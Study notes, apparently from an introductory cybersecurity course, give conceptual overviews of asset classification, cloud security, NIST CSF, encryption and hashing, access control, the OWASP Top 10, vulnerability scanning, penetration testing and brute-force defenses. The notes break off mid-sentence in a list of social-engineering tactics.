Module 1 -Intro to Asset security

Understanding risk, threat, vulnerability

 Risk: Anything that can impact the confidentiality, integrity, or availability of an asset

 Threat: Any circumstance or event that can negatively impact assets

 Vulnerability: A weakness that can be exploited by a threat

Categories of threat

Threats are circumstances or events that can negatively impact assets. There are many
different types of threats. However, they are commonly categorized as two types: intentional
and unintentional.

Categories of vulnerability

Vulnerabilities are weaknesses that can be exploited by threats. There’s a wide range of
vulnerabilities, but they can be grouped into two categories: technical and human.

Asset management and classification

Asset management is the process of tracking assets and the risks that affect them. The idea behind
this process is simple: you can only protect what you know you have.

Why asset management matters

Organizations protect a variety of different assets. Some examples might include:

 Digital assets such as customer data or financial records.

 Information systems that process data, like networks or software.

 Physical assets which can include facilities, equipment, or supplies.

 Intangible assets such as brand reputation or intellectual property.

Common asset classifications

The most common classification scheme is: restricted, confidential, internal-only, and
public.

 Restricted is the highest level. This category is reserved for incredibly

sensitive assets, like need-to-know information.

 Confidential refers to assets whose disclosure may lead to a significant

negative impact on an organization. And confidential assets should only
be accessed by those working on a specific project
  Internal-only describes assets that are available to employees and business
partners.

 Public is the lowest level of classification. These assets have no negative

consequences to the organization if they’re released.

Digital And Physical Assets

Assets in a digital world
Security teams protect data in three different states: in use, in transit, and at rest.
Data in use is data being accessed by one or more users.
Next, is data in transit. Data in transit is data traveling from one point to another.

Finally, there's data at rest. Data at rest is data not currently being accessed. In this state, data
is typically stored on a physical device.

Information security, or InfoSec, is the practice of keeping data in all states away from
unauthorized users

The emergence of cloud security

Cloud-based services
The term cloud-based services refers to a variety of on demand or web-based business
solutions. Depending on a company’s needs and budget, services can range from website
hosting, to application development environments, to entire back-end infrastructure.

There are three main categories of cloud-based services:

 Software as a service (SaaS)

 Platform as a service (PaaS)

 Infrastructure as a service (IaaS)

Software as a service (SaaS)

SaaS refers to front-end applications that users access via a web browser. The service
providers host, manage, and maintain all of the back-end systems for those applications.
Common examples of SaaS services include applications like Gmail™ email service, Slack,
and Zoom software.

Platform as a service (PaaS)

PaaS refers to back-end application development tools that clients can access online.
Developers use these resources to write code and build, manage, and deploy their own apps.
Meanwhile, the cloud service providers host and maintain the back-end hardware and
software that the apps use to operate. Some examples of PaaS services include Google App
Engine™ platform, Heroku®, and VMware Cloud Foundry.

Infrastructure as a service (IaaS)

IaaS customers are given remote access to a range of back-end systems that are hosted by the
cloud service provider. This includes data processing servers, storage, networking resources,
and more. Resources are commonly licensed as needed, making it a cost-effective alternative
to buying and maintaining on premises.

In cloud security, this concept is known as the shared responsibility model. Clients are
commonly responsible for securing anything that is directly within their control:

 Identity and access management

 Resource configuration

 Data handling

Cloud security challenges

All service providers do their best to deliver secure products to their customers. Much of their
success depends on preventing breaches and how well they can protect sensitive information.
However, since data is stored in the cloud and accessed over the internet, several challenges
arise:

 Misconfiguration is one of the biggest concerns. Customers of cloud-based services

are responsible for configuring their own security environment. Oftentimes, they use
out-of-the-box configurations that fail to address their specific security objectives.

 Cloud-native breaches are more likely to occur due to misconfigured services.

 Monitoring access might be difficult depending on the client and level of service.

 Meeting regulatory standards is also a concern, particularly in industries that are

required by law to follow specific requirements such as HIPAA, PCI DSS, and
GDPR.

Risk and Asset Security

Elements of a security plan

Security plans consist of three basic elements: policies, standards, and procedures. These three
elements are how companies share their security plans.

 A policy in security is a set of rules that reduce risk and protects information. Policies are
the foundation of every security plan.Policies focus on the strategic side of things by
identifying the scope, objectives, and limitations of a security plan
  Standards are the next part. These have a tactical function, as they concern how well
we're protecting assets. In security, standards are references that inform how to set
policies. A good way to think of standards is that they create a point of reference. For
example, many companies use the password management standard identified in NIST
Special Publication 800-63B to improve their security policies by specifying that
employees' passwords must be at least eight characters long.

 The last part of a plan is its procedures. Procedures are step-by-step instructions to
perform a specific security task. Organizations usually keep multiple procedure
documents that are used throughout the company, like how employees can choose
secure passwords, or how they can securely reset a password if it's been locked

The NIST Cybersecurity Framework is a voluntary framework that consists of standards,

guidelines, and best practices to manage cybersecurity risk. Commonly known as the CSF, this
framework was developed to help businesses secure one of their most important assets,
INFORMATION. The CSF consists of three main components: the core, tiers, and profiles.

 The core is basically a simplified version of the functions, or duties, of a security

plan. The CSF core identifies five broad functions: identify, protect, detect, respond, and
recover.

 After the core, the next NIST component we'll discuss is its tiers. These provide security
teams with a way to measure performance across each of the five functions of the
core. Tiers range from Level-1 to Level-4. Level-1, or passive, indicates a function is
reaching bare minimum standards. Level-4, or adaptive, is an indication that a function is
being performed at an exemplary standard. Overall, CSF tiers are used to assess an
organization's security posture and identify areas for improvement.

 Lastly, profiles are the final component of CSF. These provide insight into the current
state of a security plan. One way to think of profiles is like photos capturing a moment in
time. Comparing photos of the same subject taken at different times can provide useful
insights. For example, without these photos, you might not notice how this tree has
changed. They are used to help organizations develop a baseline for their cybersecurity
plans, or as a way of comparing their current cybersecurity posture to a specific industry
standard.

Module 2 – Protect Assets

Safeguard Information

Security controls
Security controls are safeguards designed to reduce specific security risks. They include a wide
range of tools that protect assets before, during, and after an event.

Security controls can be organized into three types: technical, operational, and managerial.
  Technical control types include the many technologies used to protect assets. This
includes encryption, authentication systems, and others.

 Operational controls relate to maintaining the day-to-day security environment. Generally,

people perform these controls like awareness training and incident response.

 Managerial controls are centered around how the other two reduce risk. Examples of
management controls include policies, standards, and procedures.

Principle of least privilege

The principle of least privilege is a security concept in which a user is only granted the minimum
level of access and authorization required to complete a task or function. In this reading, you'll
learn how the principle of least privilege reduces risk, how it's commonly implemented, and why it
should be routinely audited.

Limiting access reduces risk

Every business needs to plan for the risk of data theft, misuse, or abuse.

Determining access and authorization

These are the most common types of user accounts:

 Guest accounts are provided to external users who need to access an internal
network, like customers, clients, contractors, or business partners.

 User accounts are assigned to staff based on their job duties.

 Service accounts are granted to applications or software that needs to interact with
other software on the network.

 Privileged accounts have elevated permissions or administrative access.

Auditing account privileges

There are three common approaches to auditing user accounts:

 Usage audits

 Privilege audits

 Account change audits

Usage audits
When conducting a usage audit, the security team will review which resources each
account is accessing and what the user is doing with the resource. Usage audits can help
determine whether users are acting in accordance with an organization’s security policies.
They can also help identify whether a user has permissions that can be revoked because
they are no longer being used.
Privilege audits
Users tend to accumulate more access privileges than they need over time, an issue
known as privilege creep. This might occur if an employee receives a promotion or
switches teams and their job duties change. Privilege audits assess whether a user's role is
in alignment with the resources they have access to.

Account change audits

Account directory services keep records and logs associated with each user. Changes to
an account are usually saved and can be used to audit the directory for suspicious activity,
like multiple attempts to change an account password. Performing account change audits
helps to ensure that all account changes are made by authorized users.

The data lifecycle

In security, data vulnerabilities are often mapped in a model known as the data lifecycle. Each
stage of the data lifecycle plays an important role in the security controls that are put in place to
maintain the CIA triad of information.

The data lifecycle

The data lifecycle is an important model that security teams consider when protecting
information. It influences how they set policies that align with business objectives. It also
plays an important role in the technologies security teams use to make information accessible.

the data lifecycle has five stages. Each describe how data flows through an organization from
the moment it is created until it is no longer useful:

 Collect

 Store

 Use

 Archive

 Destroy

Data governance
Data governance is a set of processes that define how an organization manages
information. Governance often includes policies that specify how to keep data private,
accurate, available, and secure throughout its lifecycle.

Data governance policies commonly categorize individuals into a specific role:

 Data owner: the person that decides who can access, edit, use, or destroy their
information.

 Data custodian: anyone or anything that's responsible for the safe handling, transport,
and storage of information.
  Data steward: the person or group that maintains and implements data governance
policies set by an organization.

Information security vs. information privacy

Security and privacy are two terms that often get used interchangeably outside of this field.
Although the two concepts are connected, they represent specific functions:

 Information privacy refers to the protection of unauthorized access and distribution

of data.

 Information security (InfoSec) refers to the practice of keeping data in all states
away from unauthorized users

The key difference: Privacy is about providing people with control over their personal
information and how it's shared. Security is about protecting people’s choices and
keeping their information safe from potential threats.

Notable privacy regulations

Three of the most influential industry regulations that every security professional should
know about are:

 General Data Protection Regulation (GDPR)

 Payment Card Industry Data Security Standard (PCI DSS)

 Health Insurance Portability and Accountability Act (HIPAA)

GDPR
GDPR is a set of rules and regulations developed by the European Union (EU) that
puts data owners in total control of their personal information. Under GDPR, types of
personal information include a person's name, address, phone number, financial
information, and medical information.

The GDPR applies to any business that handles the data of EU citizens or residents,
regardless of where that business operates. For example, a US based company that
handles the data of EU visitors to their website is subject to the GDPRs provisions.

PCI DSS
PCI DSS is a set of security standards formed by major organizations in the financial
industry. This regulation aims to secure credit and debit card transactions against data
theft and fraud.
HIPAA
HIPAA is a U.S. law that requires the protection of sensitive patient health
information. HIPAA prohibits the disclosure of a person's medical information
without their knowledge and consent.

Security assessments and audits

 A security audit is a review of an organization's security controls, policies, and
procedures against a set of expectations.

 A security assessment is a check to determine how resilient current security

implementations are against threats.

Encryption Methods

Cryptography

Cryptography is the process of transforming information into a form that unintended readers can't
understand. Data of any kind is kept secret using a two-step process: encryption to hide the
information, and decryption to unhide it.
Encryption takes that information and scrambles it into an unreadable form, known as ciphertext.
We then use decryption to unscramble the ciphertext back into plaintext form, making it readable
again.
A cryptographic key is a mechanism that decrypts ciphertext.

Public key infrastructure

Public key infrastructure, or PKI, is an encryption framework that secures the exchange of
information online.

PKI is a two-step process.

1. It all starts with the exchange of encrypted information. This involves either asymmetric
encryption, symmetric encryption, or both.

Asymmetric encryption involves the use of a public and private key pair for encryption
and decryption of data.One key, the public key, can only be used to access the slot and
add items to the box. Since the public key can't be used to remove items, it can be
copied and shared with people all around the world to add items.
On the other hand, the second key, the private key, opens the box fully, so that the items
inside can be removed. Only the owner of the box has access to the private key that
unlocks it.
This two-key system makes asymmetric encryption a secure way to exchange
information online; however, it also slows down the process.

Symmetric encryption, on the other hand, is a faster and simpler approach to key
management.
Symmetric encryption involves the use of a single secret key to exchange information.
symmetric encryption uses the same key. The owner can use it to open the box, add
items, and close it again. When they want to share access, they can give the secret key
 to anyone else to do the same. Exchanging a single secret key may make web
communications faster, but it also makes it less secure.

2. PKI addresses the vulnerability of key sharing by establishing trust using a system
of digital certificates between computers and networks.

A digital certificate is a file that verifies the identity of a public key holder.

The importance of key length

Ciphers are vulnerable to brute force attacks, which use a trial and error process to discover
private information. This tactic is the digital equivalent of trying every number in a
combination lock trying to find the right one. In modern encryption, longer key lengths are
considered to be more secure. Longer key lengths mean more possibilities that an attacker
needs to try to unlock a cipher.

Approved algorithms
Symmetric algorithms
 Triple DES (3DES) is known as a block cipher because of the way it converts
plaintext into ciphertext in “blocks.” Triple DES generates keys that are 192 bits.
Despite the longer keys, many organizations are moving away from using Triple
DES due to limitations on the amount of data that can be encrypted. However,
Triple DES is likely to remain in use for backwards compatibility purposes.

 Advanced Encryption Standard (AES) is one of the most secure symmetric algorithms
today. AES generates keys that are 128, 192, or 256 bits. Cryptographic keys of this
size are considered to be safe from brute force attacks. It’s estimated that brute
forcing an AES 128-bit key could take a modern computer billions of years!

Asymmetric algorithms
 Rivest Shamir Adleman (RSA) is named after its three creators who developed it while
at the Massachusetts Institute of Technology (MIT). RSA is one of the first
asymmetric encryption algorithms that produces a public and private key pair.
Asymmetric algorithms like RSA produce even longer key lengths. In part, this is due
to the fact that these functions are creating two keys. RSA key sizes are 1,024, 2,048,
or 4,096 bits. RSA is mainly used to protect highly sensitive data.

 Digital Signature Algorithm (DSA) is a standard asymmetric algorithm that was

introduced by NIST in the early 1990s. DSA also generates key lengths of 2,048 bits.
This algorithm is widely used today as a complement to RSA in public key
infrastructure.

Non-repudiation and hashing

A hash function is an algorithm that produces a code that can't be decrypted. Unlike asymmetric
and symmetric algorithms, hash functions are one-way processes that do not generate
decryption keys. Instead, these algorithms produce a unique identifier known as a hash value, or
digest.

In security, hashes are primarily used as a way to determine the integrity of files and
applications.

Data integrity relates to the accuracy and consistency of information. This is known as non-
repudiation, the concept that authenticity of information can't be denied.

Hash collisions
One of the flaws in MD5 happens to be a characteristic of all hash functions. Hash algorithms
map any input, regardless of its length, into a fixed-size value of letters and numbers. What’s
the problem with that? Although there are an infinite amount of possible inputs, there’s only a
finite set of available outputs!

MD5 values are limited to 32 characters in length. Due to the limited output size, the
algorithm is considered to be vulnerable to hash collision, an instance when different inputs
produce the same hash value. Because hashes are used for authentication, a hash collision is
similar to copying someone’s identity. Attackers can carry out collision attacks to
fraudulently impersonate authentic data.

Next-generation hashing
To avoid the risk of hash collisions, functions that generated longer values were needed.
MD5's shortcomings gave way to a new group of functions known as the Secure Hashing
Algorithms, or SHAs. Except for SHA-1, which produces a 160-bit digest, these algorithms
are considered to be collision-resistant. However, that doesn’t make them invulnerable to
other exploits.

Five functions make up the SHA family of algorithms:

 SHA-1

 SHA-224

 SHA-256

 SHA-384

 SHA-512

Rainbow tables
A rainbow table is a file of pre-generated hash values and their associated plaintext. They’re
like dictionaries of weak passwords. Attackers capable of obtaining an organization’s
password database can use a rainbow table to compare them against all possible values.
Adding some “salt”
Functions with larger digests are less vulnerable to collision and rainbow table attacks. But as
you’re learning, no security control is perfect.

Salting is an additional safeguard that's used to strengthen hash functions. A salt is a random
string of characters that's added to data before it's hashed. The additional characters produce a
more unique hash value, making salted data resilient to rainbow table attacks.

Authentication, Authorisation, And Accounting

Access controls and authentication systems

The next series of controls that we'll be exploring are access controls, the security controls that
manage access, authorization, and accountability of information.

These systems are commonly broken down into three separate, yet related functions known as
the authentication, authorization, and accounting framework.
Authentication systems are access controls that serve a very basic purpose. They ask
anything attempting to access information this simple question: who are you?

based on three factors of authentication.

 The first is knowledge. Authentication by knowledge refers to something the
user knows, like a password or the answer to a security question they provided
previously.
 Another factor is ownership, referring to something the user possesses. A commonly
used type of authentication by ownership is a one-time passcode, or OTP.

 Last is characteristic. Authentication by this factor is something the user is. Biometrics,
like fingerprint scans on your smartphone, are example of this type of authentication.

To make access systems more convenient, many organizations these days rely on single sign-
on.
Single sign-on, or SSO, is a technology that combines several different logins into one SSO
technology is great, but not if it relies on just a single factor of authentication. Adding more
authentication factors strengthen these systems.

Multi-factor authentication, or MFA, is a security measure, which requires a user to verify their
identity in two or more ways to access a system or network. MFA combines two or more
independent credentials, like knowledge and ownership, to prove that someone is who they claim
to be.

SSO and MFA are often used in conjunction with one another to layer the defense capabilities of
authentication systems.

How SSO works

SSO works by automating how trust is established between a user and a service provider.
Rather than placing the responsibility on an employee or customer, SSO solutions use trusted
third-parties to prove that a user is who they claim to be. This is done through the exchange
of encrypted access tokens between the identity provider and the service provider.

these access tokens are exchanged using specific protocols. SSO implementations
commonly rely on two different authentication protocols: LDAP and SAML

LDAP, which stands for Lightweight Directory Access Protocol, is mostly used to transmit
information on-premises;

SAML, which stands for Security Assertion Markup Language, is mostly used to transmit
information off-premises, like in the cloud.

Limitations of SSO
Usernames and passwords alone are not always the most secure way of protecting sensitive
information. SSO provides useful benefits, but there’s still the risk associated with using one
form of authentication. For example, a lost or stolen password could expose information
across multiple services

MFA to the rescue

Multi-factor authentication (MFA) requires a user to verify their identity in two or more
ways to access a system or network

The mechanisms of authorization

Authorization is linked to the idea that access to information only lasts as long as needed
(LEAST PRIVILEGE).
Authorization systems are also heavily influenced by this idea in addition to another important
security principle, the separation of duties.

When it comes to securing data over a network, there are a couple of frequently used
access controls that you should be familiar with: HTTP basic auth and OAuth.

 HTTP basic auth

Have you ever wondered what the HTTP in web addresses stood for.
It stands for hypertext transfer protocol, which is how communications are established
over network. HTTP uses what is known as basic auth, the technology used to
establish a user's request to access a server. Basic auth works by sending an identifier
every time a user communicates with a web page.

However, their protocol is considered to be vulnerable to attacks because it transmits

usernames and password openly over the network. Most websites today use HTTPS
instead, which stands for hypertext transfer protocol secure. This protocol doesn't expose
sensitive information, like access credentials, when communicating over the network.

 Another secure authentication technology used today is OAuth. OAuth is an open-

standard authorization protocol that shares designated access between applications.

Instead of requesting and sending sensitive usernames and passwords over the
network, OAuth uses API tokens to verify access between you and a service provider.

An API token is a small block of encrypted code that contains information about a user.
 These tokens contain things like your identity, site permissions, and more. OAuth sends
and receives access requests using API tokens by passing them from a server to a user's
device.

Why we audit user activity

Accounting is the practice of monitoring the access logs of a system. These logs contain
information like who accessed the system, and when they accessed it, and what resources they
used.Anytime a user accesses a system, they initiate what's called a session.
A session is a sequence of network HTTP basic auth requests and responses associated with
the same user, like when you visit a website.

Access logs are essentially records of sessions that capture the moment a user enters a system
until the moment they leave it.Two actions are triggered when the session begins.

The first is the creation of a session ID. A session ID is a unique token that identifies a user and
their device while accessing the system. Session IDs are attached to the user until they either
close their browser or the session times out.

The second action that takes place at the start of a session is an exchange of session cookies
between a server and a user's device. A session cookie is a token that websites use to
validate a session and determine how long that session should last. When cookies are
exchanged between your computer and a server, your session ID is read to determine
what information the website should show you.Cookies make web sessions safer and more
efficient.
The exchange of tokens means that no sensitive information, like usernames and passwords, are
shared.
Session cookies prevent attackers from obtaining sensitive data. However, there's other damage
that they can do. With a stolen cookie, an attacker can impersonate a user using their session
token. This kind of attack is known as session hijacking.

Session hijacking is an event when attackers obtain a legitimate user's session ID. During these
kinds of attacks, cyber criminals impersonate the user, causing all sorts of harm.

Granting authorization
If the right user has been authenticated, the network should ensure the right resources are
made available. There are three common frameworks that organizations use to handle this
step of IAM:

 Mandatory access control (MAC)

 Discretionary access control (DAC)

 Role-based access control (RBAC)

Mandatory Access Control (MAC)

MAC is the strictest of the three frameworks. Authorization in this model is based on a strict
need-to-know basis. Access to information must be granted manually by a central authority or
system administrator. For example, MAC is commonly applied in law enforcement, military,
and other government agencies where users must request access through a chain of command.
MAC is also known as non-discretionary control because access isn’t given at the discretion
of the data owner.
Discretionary Access Control (DAC)
DAC is typically applied when a data owner decides appropriate levels of access. One
example of DAC is when the owner of a Google Drive folder shares editor, viewer, or
commentor access with someone else

Role-Based Access Control (RBAC)

RBAC is used when authorization is determined by a user's role within an organization. For
example, a user in the marketing department may have access to user analytics but not
network administration.
  IDPro© is a professional organization dedicated to sharing essential IAM industry
knowledge.

Module 3 – Vulnerabilities in the System

Security teams spend a lot of time finding vulnerabilities and thinking of how they can be
exploited. They do this with the process known as vulnerability management. Vulnerability
management is the process of finding and patching vulnerabilities

Vulnerability management is a four step process.

 The first step is to identify vulnerabilities.
 The next step is to consider potential exploits of those vulnerabilities.
 Third is to prepare defenses against threats. And finally,
 the fourth step is to evaluate those defenses.

New vulnerabilities are constantly being discovered. These are known as zero-day exploits. A
zero-day is an exploit that was previously unknown. The term zero-day refers to the fact that the
exploit is happening in real time with zero days to fix it. These kinds of exploits are
dangerous. They represent threats that haven't been planned for yet.

Defense in depth strategy

Defense in depth is commonly referred to as the castle approach because it resembles the
layered defenses of a castle.

It's mainly used in cybersecurity to protect information using a five layer design. Each layer
features a number of security controls that protect information as it travels in and out of the
model.
  The first layer of defense in depth is the perimeter layer. This layer includes some
technologies that we've already explored, like usernames and passwords. Mainly, this
is a user authentication layer that filters external access. Its function is to only allow
access to trusted partners to reach the next layer of defense.

 Second, the network layer is more closely aligned with authorization. The network layer
is made up of other technologies like network firewalls and others.

 Next, is the endpoint layer. Endpoints refer to the devices that have access on a
network. They could be devices like a laptop, desktop, or a server. Some examples of
technologies that protect these devices are anti-virus software.

 After that, we get to the application layer. This includes all the interfaces that are used
to interact with technology. At this layer, security measures are programmed as part of an
application. One common example is multi-factor authentication.

 And finally, the fifth layer of defense is the data layer. At this layer, we've arrived at the
critical data that must be protected, like personally identifiable information. One security
control that is important here in this final layer of defense is asset classification.

Common vulnerabilities and exposures

While a vulnerability is a weakness of a system, an exposure is a mistake that can be exploited
by a threat.

One of the most popular libraries of vulnerabilities and exposures is the CVE list. The common
vulnerabilities and exposures list, or CVE list, is an openly accessible dictionary of known
vulnerabilities and exposures. It is a popular resource.

The CVE list tests four criteria that a vulnerability must have before it's assigned an ID.

 First, it must be independent of other issues. In other words, the vulnerability should be
able to be fixed without having to fix something else.

 Second, it must be recognized as a potential security risk by whoever reports it.

 Third, the vulnerability must be submitted with supporting evidence.

 And finally, the reported vulnerability can only affect one codebase, or in other words,
only one program's source code.

The NIST National Vulnerabilities Database uses what's known as the common vulnerability
scoring system, or CVSS, which is a measurement system that scores the severity of a
vulnerability. Security teams use CVSS as a way of calculating the impact a vulnerability could
have on a system. They also use them to determine how quickly a vulnerability should be
patched.

The NIST National Vulnerabilities Database provides a base score of CVEs on a scale of 0-10.
scores reflect the moment a vulnerability is evaluated, so they don't change over time.

In general, a CVSS that scores below a 4.0 is considered to be low risk and doesn't require
immediate attention. However, anything above a 9.0 is considered to be a critical risk
to company assets that should be addressed right away.
The OWASP Top 10

These are the most regularly listed vulnerabilities that appear in their rankings to know about

Broken access control

Access controls limit what users can do in a web application. For example, a blog
might allow visitors to post comments on a recent article but restricts them from
deleting the article entirely. Failures in these mechanisms can lead to unauthorized
information disclosure, modification, or destruction. They can also give someone
unauthorized access to other business applications.

Cryptographic failures
Information is one of the most important assets businesses need to protect. Privacy
laws such as General Data Protection Regulation (GDPR) require sensitive data to be
protected by effective encryption methods. Vulnerabilities can occur when businesses
fail to encrypt things like personally identifiable information (PII). For example, if a
web application uses a weak hashing algorithm, like MD5, it’s more at risk of
suffering a data breach.

Injection
Injection occurs when malicious code is inserted into a vulnerable application.

Insecure design
Applications should be designed in such a way that makes them resilient to attack.
Insecure design refers to a wide range of missing or poorly implemented security
controls that should have been programmed into an application when it was being
developed.

Security misconfiguration
Misconfigurations occur when security settings aren’t properly set or maintained.

Vulnerable and outdated components

Vulnerable and outdated components is a category that mainly relates to application
development

Identification and authentication failures

Identification is the keyword in this vulnerability category. When applications fail to
recognize who should have access and what they’re authorized to do, it can lead to
serious problems.

Software and data integrity failures

Software and data integrity failures are instances when updates or patches are
inadequately reviewed before implementation

Security logging and monitoring failures

In security, it’s important to be able to log and trace back events.
Server-side request forgery
Companies have public and private information stored on web servers. When you use
a hyperlink or click a button on a website, a request is sent to a server that should
validate who you are, fetch the appropriate data, and then return it to you.Server-side
request forgeries (SSRFs) are when attackers manipulate the normal operations of
a server to read or update other resources on that server.

Open-source intelligence

OSINT is the collection and analysis of information from publicly available sources to generate
usable intelligence. It's commonly used to support cybersecurity activities, like identifying
potential threats and vulnerabilities.

Information vs intelligence

Information refers to the collection of raw data or facts about a specific subject. Intelligence,
on the other hand, refers to the analysis of information to produce knowledge or insights that
can be used to support decision-making.

Here are some of the ways OSINT can be used to generate intelligence:

 To provide insights into cyber attacks

 To detect potential data exposures

 To evaluate existing defenses

 To identify unknown vulnerabilities

OSINT tools

 VirusTotal is a service that allows anyone to analyze suspicious files, domains, URLs,
and IP addresses for malicious content.

 MITRE ATT&CK® is a knowledge base of adversary tactics and techniques based on

real-world observations.

 OSINT Framework is a web-based interface where you can find OSINT tools for
almost any kind of source or platform.

 Have I been Pwned is a tool that can be used to search for breached email accounts.
Vulnerability assessments
Weaknesses and flaws are generally found during a vulnerability assessment.
A vulnerability assessment is the internal review process of an organization's security systems.

Once they decide what to focus on, vulnerability assessments typically follow a four-step
process.
 The first step is identification. Here, scanning tools and manual testing are used to find
vulnerabilities. During the identification step, the goal is to understand the current state of
a security system, like taking a picture of it.
 The next step of the process is vulnerability analysis. During this step, each of the
vulnerabilities that were identified are tested
 The third step of the process is risk assessment. During this step of the process, a
score is assigned to each vulnerability. This score is assigned based on two factors: how
severe the impact would be if the vulnerability were to be exploited and the likelihood of
this happening
 The fourth and final step of vulnerability assessment is remediation. It's during this step
that the vulnerabilities that can impact the organization are addressed.

What is a vulnerability scanner?

A vulnerability scanner is software that automatically compares known vulnerabilities and

exposures against the technologies on the network. In general, these tools scan systems to
find misconfigurations or programming flaws.

Scanning tools are used to analyze each of the five attack surfaces that you learned about in
the video about the defense in depth strategy:

1. Perimeter layer, like authentication systems that validate user access

2. Network layer, which is made up of technologies like network firewalls and others

3. Endpoint layer, which describes devices on a network, like laptops, desktops, or

servers

4. Application layer, which involves the software that users interact with

5. Data layer, which includes any information that’s stored, in transit, or in use

External vs. internal Scan

External and internal scans simulate an attacker's approach.

External scans test the perimeter layer outside of the internal network. They analyze outward
facing systems, like websites and firewalls. These kinds of scans can uncover vulnerable
things like vulnerable network ports or servers.
Internal scans start from the opposite end by examining an organization's internal systems.
For example, this type of scan might analyze application software for weaknesses in how it
handles user input.

Authenticated vs. unauthenticated Scans

Authenticated and unauthenticated scans simulate whether or not a user has access to a
system.

Authenticated scans might test a system by logging in with a real user account or even with
an admin account. These service accounts are used to check for vulnerabilities, like broken
access controls.

Unauthenticated scans simulate external threat actors that do not have access to your
business resources.

Limited vs. comprehensive

Limited and comprehensive scans focus on particular devices that are accessed by internal
and external users.

Limited scans analyze particular devices on a network, like searching for misconfigurations
on a firewall.

Comprehensive scans analyze all devices connected to a network. This includes operating
systems, user databases, and more.

Pro tip: Discovery scanning should be done prior to limited or comprehensive scans.
Discovery scanning is used to get an idea of the computers, devices, and open ports that are
on a network.

The importance of updates

A patch update is a software and operating system update that addresses security
vulnerabilities within a program or product. Patches usually contain bug fixes that
address common security vulnerabilities and exposures.

Common update strategies

When software updates become available, clients and users have two installation options:

 Manual updates

 Advantage: An advantage of manual update deployment strategies is control.

That can be useful if software updates are not thoroughly tested by developers,
leading to instability issues.

 Disadvantage: A drawback to manual update deployments is that critical

updates can be forgotten or disregarded entirely.
  Automatic updates

 Advantage: An advantage to automatic updates is that the deployment process

is simplified. It also keeps systems and software current with the latest, critical
patches.

 Disadvantage: A drawback to automatic updates is that instability issues can

occur if the patches were not thoroughly tested by the vendor. This can result
in performance problems and a poor user experience.

End-of-life software

Sometimes updates are not available for a certain type of software known as end-of-life
(EOL) software. All software has a lifecycle. It begins when it’s produced and ends when a
newer version is released. At that point, developers must allocate resources to the newer
versions, which leads to EOL software. While the older software is still useful, the
manufacturer no longer supports it.

Note: Patches and updates are very different from upgrades. Upgrades refer to completely
new versions of hardware or software that can be purchased.

The risks that EOL software presents continues to grow as more connected devices enter
the marketplace. For example, there are billions of Internet of Things (IoT) devices, like
smart light bulbs, connected to home and work networks. In some business settings, all
an attacker needs is a single unpatched device to gain access to the network and cause
problems.

Penetration testing

A penetration test, or pen test, is a simulated attack that helps identify vulnerabilities in
systems, networks, websites, applications, and processes. The simulated attack in a pen test
involves using the same tools and techniques as malicious actors in order to mimic a real life
attack. Since a pen test is an authorized attack, it is considered to be a form of ethical
hacking. Unlike a vulnerability assessment that finds weaknesses in a system's security, a pen
test exploits those weaknesses to determine the potential consequences if the system breaks
or gets broken into by a threat actor.

Depending on their objectives, organizations might use a few different approaches to

penetration testing:

 Red team tests simulate attacks to identify vulnerabilities in systems, networks, or

applications.

 Blue team tests focus on defense and incident response to validate an organization's
existing security systems.
  Purple team tests are collaborative, focusing on improving the security posture of the
organization by combining elements of red and blue team exercises.

Red team tests are commonly performed by independent pen testers who are hired to
evaluate internal systems.

Penetration testing strategies

There are three common penetration testing strategies:

 Open-box testing is when the tester has the same privileged access that an internal
developer would have—information like system architecture, data flow, and network
diagrams. This strategy goes by several different names, including internal, full
knowledge, white-box, and clear-box penetration testing.

 Closed-box testing is when the tester has little to no access to internal systems—
similar to a malicious hacker. This strategy is sometimes referred to as external,
black-box, or zero knowledge penetration testing.

 Partial knowledge testing is when the tester has limited access and knowledge of an
internal system—for example, a customer service representative. This strategy is also
known as gray-box testing.

Closed box testers tend to produce the most accurate simulations of a real-world attack.
Nevertheless, each strategy produces valuable results by demonstrating how an attacker
might infiltrate a system and what information they could access.

Programming skills are very helpful in penetration testing because it's often performed on
software and IT systems. With enough practice and dedication, cybersecurity professionals at
any level can develop the skills needed to be a pen tester.

Bug bounty programs

Organization’s commonly run bug bounty programs which offer freelance pen testers
financial rewards for finding and reporting vulnerabilities in their products. Bug bounties are
great opportunities for amateur security professionals to participate and grow their skills.

HackerOne is a community of ethical hackers where you can find active bug bounties to
participate in.

Fortify against brute force cyber attacks

Attackers use a variety of tactics to find their way into a system:

 Simple brute force attacks are an approach in which attackers guess a user's login
credentials. They might do this by entering any combination of username and
password that they can think of until they find the one that works.
  Dictionary attacks are a similar technique except in these instances attackers use a list
of commonly used credentials to access a system. This list is similar to matching a
definition to a word in a dictionary.

 Reverse brute force attacks are similar to dictionary attacks, except they start with a
single credential and try it in various systems until a match is found.

 Credential stuffing is a tactic in which attackers use stolen login credentials from
previous data breaches to access user accounts at another organization. A specialized
type of credential stuffing is called pass the hash. These attacks reuse stolen, unsalted
hashed credentials to trick an authentication system into creating a new authenticated
user session on the network.

Note: Besides access credentials, encrypted information can sometimes be brute forced using
a technique known as exhaustive key search.

Each of these methods involve a lot of guess work. Brute forcing your way into a system can
be a tedious and time consuming process—especially when it’s done manually. That’s why
threat actors often use tools to conduct their attacks.

Tools of the trade

These are some common brute forcing tools:

 Aircrack-ng

 Hashcat

 John the Ripper

 Ophcrack

 THC Hydra

Sometimes, security professionals use these tools to test and analyze their own systems. They
each serve different purposes. For example, you might use Aircrack-ng to test a Wi-Fi
network for vulnerabilities to brute force attack.

Prevention measures

Organizations defend against brute force attacks with a combination of technical and
managerial controls. Each make cracking defense systems through brute force less likely:

 Hashing and salting

 Multi-factor authentication (MFA)

 CAPTCHA

 Password policies
CAPTCHA
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and
Humans Apart. It is known as a challenge-response authentication system. CAPTCHA asks
users to complete a simple test that proves they are human and not software that’s trying to
brute force a password.

Module 4

Social engineering tactics

These are common types of social engineering to watch out for:

 Baiting is a social engineering tactic that tempts people into compromising their
security. A common example is USB baiting that relies on someone finding an
infected USB drive and plugging it into their device.

 Phishing is the use of digital communications to trick people into revealing sensitive
data or deploying malicious software. It is one of the most common forms of social
engineering, typically performed via email.

 Quid pro quo is a type of baiting used to trick someone into believing that they’ll be
rewarded in return for sharing access, information, or money. For example, an
attacker might impersonate a loan officer at a bank and call customers offering them a
lower interest rate on their credit card. They'll tell the customers that they simply need
to provide their account details to claim the deal.

 Tailgating is a social engineering tactic in which unauthorized people follow an

authorized person into a restricted area. This technique is also sometimes referred to
as piggybacking.

 Watering hole is a type of attack when a threat actor compromises a website

